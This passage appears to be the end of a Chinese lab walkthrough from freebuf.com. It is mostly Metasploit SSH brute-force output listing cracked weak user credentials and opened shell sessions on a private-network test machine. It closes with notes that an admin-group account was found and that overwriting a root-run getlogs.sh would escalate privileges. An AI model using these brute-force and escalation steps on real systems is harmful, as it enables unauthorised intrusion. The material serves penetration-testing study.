Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 36 opened (192.168.1.20:44687 -> 192.168.1.120:22) at 2019-02-27 21:49:06 -0500 [+] 192.168.1.120:22 - Success: 'dcooper:pepper' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 37 opened (192.168.1.20:44397 -> 192.168.1.120:22) at 2019-02-27 21:49:06 -0500 [+] 192.168.1.120:22 - Success: 'kwebber:princess' 'uid=1005(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 38 opened (192.168.1.20:42809 -> 192.168.1.120:22) at 2019-02-27 21:49:06 -0500 [+] 192.168.1.120:22 - Success: 'aard:qwerty' 'uid=1044(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 39 opened (192.168.1.20:42585 -> 192.168.1.120:22) at 2019-02-27 21:49:07 -0500 [+] 192.168.1.120:22 - Success: 'dgrant:nintendo' 'uid=1018(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 40 opened (192.168.1.20:44497 -> 192.168.1.120:22) at 2019-02-27 21:49:07 -0500 [+] 192.168.1.120:22 - Success: 'sgains:soccer' 'uid=1021(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 41 opened (192.168.1.20:35859 -> 192.168.1.120:22) at 2019-02-27 21:49:08 -0500 [+] 192.168.1.120:22 - Success: 'amaynard:shadow' 'uid=1043(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 42 opened (192.168.1.20:37705 -> 192.168.1.120:22) at 2019-02-27 21:49:08 -0500 [+] 192.168.1.120:22 - Success: 'qpowers:pokemon' 'uid=1004(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 43 opened (192.168.1.20:41009 -> 192.168.1.120:22) at 2019-02-27 21:49:08 -0500 [+] 192.168.1.120:22 - Success: 'tdeleon:starwars' 'uid=1010(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 44 opened (192.168.1.20:35179 -> 192.168.1.120:22) at 2019-02-27 21:49:09 -0500 [+] 192.168.1.120:22 - Success: 'jduff:superman' 'uid=1047(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 45 opened (192.168.1.20:43437 -> 192.168.1.120:22) at 2019-02-27 21:49:09 -0500 [+] 192.168.1.120:22 - Success: 'dwestling:welcome' 'uid=1016(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 46 opened (192.168.1.20:35525 -> 192.168.1.120:22) at 2019-02-27 21:49:09 -0500 [+] 192.168.1.120:22 - Success: 'jalvarez:whatever' 'uid=1000(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 47 opened (192.168.1.20:40973 -> 192.168.1.120:22) at 2019-02-27 21:49:10 -0500 [+] 192.168.1.120:22 - Success: 'myajima:trustno1' 'uid=1035(myajima) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 48 opened (192.168.1.20:41055 -> 192.168.1.120:22) at 2019-02-27 21:49:10 -0500 [+] 192.168.1.120:22 - Success: 'mholland:sunshine' 'uid=1006(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i5-8300H CPU @ 2.30GHz GenuineIntel GNU/Linux ' [*] Command shell session 49 opened (192.168.1.20:37249 -> 192.168.1.120:22) at 2019-02-27 21:49:11 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
找到了ccoffee这个权限比较大,登录进去看看
Success: 'ccoffee:1234' 'uid=1023(ccoffee) gid=100(users) groups=100(users),102(admin)
getlogs.sh以root身份执行,我们可以修改文件并覆盖内容以满足升级权限的目的
来源:freebuf.com 2019-02-28 23:48:18 by: 陌度
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册